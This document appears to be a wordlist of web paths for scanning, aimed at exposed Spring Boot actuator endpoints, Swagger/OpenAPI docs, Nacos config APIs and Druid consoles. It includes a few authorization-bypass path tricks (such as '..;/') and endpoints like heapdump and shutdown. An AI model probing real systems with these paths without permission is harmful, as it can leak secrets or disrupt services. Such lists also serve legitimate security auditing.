nacos/actuator/service-registry/actuator/prometheus
nacos/actuator/sessions
nacos/actuator/sessions/
nacos/actuator/sessions/actuator/swagger-ui.html
nacos/actuator/shutdown
nacos/actuator/solr
nacos/actuator/spring-security-oauth-resource/swagger-ui.html
nacos/actuator/spring-security-oauth2-resource-server
nacos/actuator/spring-security-rest/api/swagger-ui.html
nacos/actuator/springwebflow
nacos/actuator/springWebflow
nacos/actuator/sso
nacos/actuator/ssosessions
nacos/actuator/ssoSessions
nacos/actuator/static/swagger.json
nacos/actuator/statistics
nacos/actuator/status
nacos/actuator/sw/swagger-ui.html
nacos/actuator/swagger
nacos/actuator/swagger-dubbo/api-docs
nacos/actuator/swagger-resourcesce
nacos/actuator/swagger-ui
nacos/actuator/swagger-ui.html
nacos/actuator/swagger-ui/index.html
nacos/actuator/swagger/codes
nacos/actuator/swagger/index.html
nacos/actuator/swagger/static/index.html
nacos/actuator/system
nacos/actuator/system/
nacos/actuator/system/env
nacos/actuator/system/mappings
nacos/actuator/system/showOsInfo
nacos/actuator/system/showProperties
nacos/actuator/tasks
nacos/actuator/template/swagger-ui.html
nacos/actuator/threaddump
nacos/actuator/threaddump/actuator/monitor/scheduledtasks
nacos/actuator/tra
nacos/actuator/trace
nacos/actuator/transactions
nacos/actuator/user/swagger-ui.html
nacos/actuator/versions
nacos/actuator/websocket
nacos/actuators/dump
nacos/actuators/env
nacos/actuators/health
nacos/actuators/heapdump
nacos/actuators/logfile
nacos/actuators/mappings
nacos/actuators/shutdown
nacos/actuators/trace
nacos/env
nacos/v1/cs/configs
nacos/v1/cs/configs?dataId=Misplaced
nacos/v1/ns/instance
nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
nacos/v2/cs/configs
nacos/v2/cs/configs?dataId=Misplaced
nacos/v2/ns/instance
nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
new_route
nonswagger
oauth/authorize/actuator/swagger/index.html
oauth/check_token/actuator/swagger/static/index.html
oauth/client/token/api-docs
oauth/confirm_access/actuator/system/
oauth/error/actuator/system/env
oauth/get/token/api.html
oauth/refresh/token/api/doc
oauth/remove/token/api/index.html
oauth/token/actuator/system/mappings
oauth/token/list/api/swagger
oauth/user/token/api/swagger-resources
oauth/userinfo/api/swagger-ui.html
openapi.json
openapi.yaml
openapi.yml
openapi/v1/openapi.json
openapi/v1/openapi.yaml
package_search/v4/documentation
path
path/
peripheral/swagger-ui.html
peripheral/v2/api-docs
portal/api-docs/swagger.json
portal/api-docs/swagger.yaml
portal/api/apidocs/swagger.json
portal/api/apidocs/swagger.yaml
portal/api/spec/swagger.json
portal/api/spec/swagger.yaml
portal/api/swagger.json
portal/api/swagger.yaml
portal/api/swaggerui/swagger.json
portal/api/swaggerui/swagger.yaml
portal/api/v1.0/swagger.json
portal/api/v1.0/swagger.yaml
portal/api/v1/swagger.json
portal/api/v1/swagger.yaml
portal/api/v2.0/swagger.json
portal/api/v2.0/swagger.yaml
portal/api/v2/swagger.json
portal/api/v2/swagger.yaml
portal/apidocs/swagger.json
portal/apidocs/swagger.yaml
portal/static/api/swagger.json
portal/static/api/swagger.yaml
portal/swagger-ui/swagger.json
portal/swagger-ui/swagger.yaml
portal/swagger.json
portal/swagger.yaml
portal/swagger/v1/swagger.json
portal/swagger/v1/swagger.yaml
portal/swagger/v2/swagger.json
portal/swagger/v2/swagger.yaml
portal/v1/swagger.json
portal/v1/swagger.yaml
portal/v2/swagger.json
portal/v2/swagger.yaml
prometheus
pwd
pwd/
quartz
redis/info
redis/keysSize
redis/keysSize/api/swagger/ui
redis/memoryInfo
redis/memoryInfo/api/swaggerui
refresh
refresh/
registeredServices
releaseAttributes
resolveAttributes
rest/api-docs
rest/api-docs/swagger.json
rest/api-docs/swagger.yaml
rest/api/apidocs/swagger.json
rest/api/apidocs/swagger.yaml
rest/api/spec/swagger.json
rest/api/spec/swagger.yaml
rest/api/swagger.json
rest/api/swagger.yaml
rest/api/swaggerui/swagger.json
rest/api/swaggerui/swagger.yaml
rest/api/v1.0/swagger.json
rest/api/v1.0/swagger.yaml
rest/api/v1/swagger.json
rest/api/v1/swagger.yaml
rest/api/v2.0/swagger.json
rest/api/v2.0/swagger.yaml
rest/api/v2/swagger.json
rest/api/v2/swagger.yaml
rest/apidocs/swagger.json
rest/apidocs/swagger.yaml
rest/static/api/swagger.json
rest/static/api/swagger.yaml
rest/swagger-ui/swagger.json
rest/swagger-ui/swagger.yaml
rest/swagger.json
rest/swagger.yaml
rest/swagger/v1/swagger.json
rest/swagger/v1/swagger.yaml
rest/swagger/v2/swagger.json
rest/swagger/v2/swagger.yaml
rest/v1
rest/v1/docs
rest/v1/swagger
rest/v1/swagger.json
rest/v1/swagger.yaml
rest/v2/swagger.json
rest/v2/swagger.yaml
rest/v3/doc
restart
restart/
routes
routes/
rx
scheduledtasks
secure/api-docs/swagger.json
secure/api-docs/swagger.yaml
secure/api/apidocs/swagger.json
secure/api/apidocs/swagger.yaml
secure/api/spec/swagger.json
secure/api/spec/swagger.yaml
secure/api/swagger.json
secure/api/swagger.yaml
secure/api/swaggerui/swagger.json
secure/api/swaggerui/swagger.yaml
secure/api/v1.0/swagger.json
secure/api/v1.0/swagger.yaml
secure/api/v1/swagger.json
secure/api/v1/swagger.yaml
secure/api/v2.0/swagger.json
secure/api/v2.0/swagger.yaml
secure/api/v2/swagger.json
secure/api/v2/swagger.yaml
secure/apidocs/swagger.json
secure/apidocs/swagger.yaml
secure/static/api/swagger.json
secure/static/api/swagger.yaml
secure/swagger-ui/swagger.json
secure/swagger-ui/swagger.yaml
secure/swagger.json
secure/swagger.yaml
secure/swagger/v1/swagger.json
secure/swagger/v1/swagger.yaml
secure/swagger/v2/swagger.json
secure/swagger/v2/swagger.yaml
secure/v1/swagger.json
secure/v1/swagger.yaml
secure/v2/swagger.json
secure/v2/swagger.yaml
service/rest/swagger.json
service/swagger-ui/index.html
services
services/
services/1
services/api/v2/api-docs
services/findAlls/api/v1/api-docs
services/findOnes/api/v1/login
services/granted/api/v1/swagger-resources
services/saveOrUpdate/api/v1/swagger-ui.html
sessions
sessions/
shutdown
shutdown/
smartpay/swagger/core
spec/swagger.json
spec/swagger.yaml
spring
spring-security-oauth-resource/swagger-ui.html
spring-security-rest/api/swagger-ui.html
spring.jmx.enabled
spring/
springWebflow
springWebflow/
sso
sso/
ssoSessions
ssoSessions/
startup
startup/
static/api/swagger.json
static/api/swagger.yaml
static/swagger-ui
static/swagger-ui/index.html
static/swagger.json
statistics
statistics/
status
status/
sw
sw/
sw/swagger-ui.html
swagger
swagger_doc.json
swagger_docs/
swagger_docs/v1
swagger-api
swagger-api/
swagger-dubbo/api-docs
swagger-resources
swagger-resources/
swagger-resources/actuator/shutdown
swagger-resources/configuration
swagger-resources/configuration/security
swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html
swagger-resources/configuration/ui
swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html
swagger-resources/restservices
swagger-resources/restservices/v2/api-docs
swagger-ui
swagger-ui-dist/
swagger-ui-dist/index.html
swagger-ui.html
swagger-ui.html/api/v2/swagger.json
swagger-ui.html#
swagger-ui.json
swagger-ui.yaml
swagger-ui/
swagger-ui/#/
swagger-ui/api-docs
swagger-ui/api-docs/swagger.json
swagger-ui/html
swagger-ui/index
swagger-ui/index.html
swagger-ui/swagger.json
swagger-ui/swagger.yaml
swagger.json
swagger.json 
swagger.sh
swagger.yaml
swagger.yml
swagger/
swagger/api
swagger/api_docs
swagger/api-docs
swagger/api.yaml
swagger/api/v1
swagger/codes
swagger/core
swagger/doc
swagger/doc.json
swagger/docs/default
swagger/docs/v1
swagger/docs/v1.yaml
swagger/docs/v2
swagger/docs/v2.yaml
swagger/explorer
swagger/index.html
swagger/index.yaml
swagger/resources
swagger/static/index.html
swagger/swagger
swagger/swagger-ui.htm
swagger/swagger-ui.html
swagger/swagger-ui/
swagger/swagger-ui/index.html
swagger/ui
swagger/ui/
swagger/ui/index
Swagger/ui/index
swagger/ui/index.html
swagger/v1
swagger/v1/api-docs
swagger/v1/swagger.json
swagger/v1/swagger.json/
swagger/v1/swagger.yaml
swagger/v2
swagger/v2/api-docs
swagger/v2/swagger.json
swagger/v2/swagger.yaml
swagger/v3/swagger.json
swaggerapi
swaggerui
system/
system/druid/index.html
system/druid/login.html
system/druid/websession.html
system/env
system/mappings
system/showOsInfo
system/showProperties
template/swagger-ui.html
threaddump
threaddump/
tmp/heapdump
tmp/heapdump1
trace
trace/
tz
uc/env
ui
ui/
update-generated-swagger-docs.sh
update-swagger-spec.sh
user/swagger-ui.html
v1
V1
v1.0
V1.0
v1.01
v1.02
v1.03
v1.04
v1.05
v1.06
v1.07
v1.08
v1.09
v1.1
V1.1
v1.1/swagger-ui.html
v1.10
v1.11
v1.12
v1.13
v1.14
v1.15
v1.16
v1.17
v1.18
v1.19
v1.2
v1.2/swagger-ui.html
v1.20
v1.21
v1.22
v1.23
v1.24
v1.25
v1.26
v1.27
v1.28
v1.29
v1.3
v1.3/swagger-ui.html
v1.30
v1.31
v1.32
v1.33
v1.34
v1.35
v1.36
v1.37
v1.38
v1.39
v1.4
v1.4/swagger-ui.html
v1.40
v1.41
v1.42
v1.43
v1.44
v1.45
v1.46
v1.47
v1.48
v1.49
v1.5
v1.5/swagger-ui.html
v1.50
v1.51
v1.52
v1.53
v1.54
v1.55
v1.56
v1.57
v1.58
v1.59
v1.6
v1.6/swagger-ui.html
v1.60
v1.61
v1.62
v1.63
v1.64
v1.65
v1.66
v1.67
v1.68
v1.69
v1.7
v1.7/swagger-ui.html
v1.70
v1.71
v1.72
v1.73
v1.74
v1.75
v1.76
v1.77
v1.78
v1.79
v1.8
v1.8/swagger-ui.html
v1.80
v1.81
v1.82
v1.83
v1.84
v1.85
v1.86
v1.87
v1.88
v1.89
v1.9
v1.9/swagger-ui.html
v1.90
v1.91
v1.92
v1.93
v1.94
v1.95
v1.96
v1.97
v1.98
v1.99
v1.x/swagger-ui.html
v1/..;/v2/api-docs
v1/agent/self/actuator/system/showProperties
v1/api-docs
v1/api-docs.yaml
v1/api-docs/swagger.json
v1/api/swagger.json
v1/api/swagger.yaml
v1/catalog/service/app
v1/catalog/services/actuator/threaddump
v1/cs/configs
v1/cs/configs?dataId=Misplaced
v1/documentation/api
v1/ns/instance
v1/ns/instance?serviceName=springboot2-nacos-discovery
v1/rest/swagger.json
v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
v1/swagger-ui.html
v1/swagger.json
v1/swagger.yaml
v2
v2-ag
v2.0
v2.0/swagger-ui.html
v2.1/swagger-ui.html
v2.2/swagger-ui.html
v2.3/swagger-ui.html
v2/api-docs
v2/api-docs?group=swagger接口文档
v2/api-docs.json
v2/api/swagger.json
v2/cs/configs
v2/cs/configs?dataId=Misplaced
v2/ns/instance
v2/ns/instance?serviceName=springboot2-nacos-discovery
v2/rest/swagger.json
v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
v2/swagger-ui.html
v2/swagger.json
v2/swagger.yaml
v3
v3/..;/v2/api-docs
v3/api-docs
v3/api-docs/swagger.json
v3/swagger.json
v5
v6
v7
v8
validata/code
verify-generated-swagger-docs.sh
verify-swagger-spec.sh
version
version/
webjars/**/actuator/nacosconfig
webjars/swagger-ui/index.html
webpage/system/druid/index.html
webpage/system/druid/login.html
webpage/system/druid/websession.html